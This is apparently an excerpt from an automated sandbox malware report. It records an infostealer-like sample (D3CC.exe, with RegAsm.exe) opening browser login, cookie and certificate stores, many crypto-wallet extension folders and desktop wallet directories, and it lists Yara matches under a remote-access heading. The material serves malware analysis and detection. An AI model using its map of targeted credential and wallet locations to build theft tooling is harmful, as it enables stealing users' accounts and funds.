Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2364194118.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: D3CC.exe PID: 6596, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: D3CC.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C12E.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2113910213.000000000048B000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2352119680.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C12E.exe PID: 6280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.1986547068.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1986391859.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1719529460.0000000002FD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718695022.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs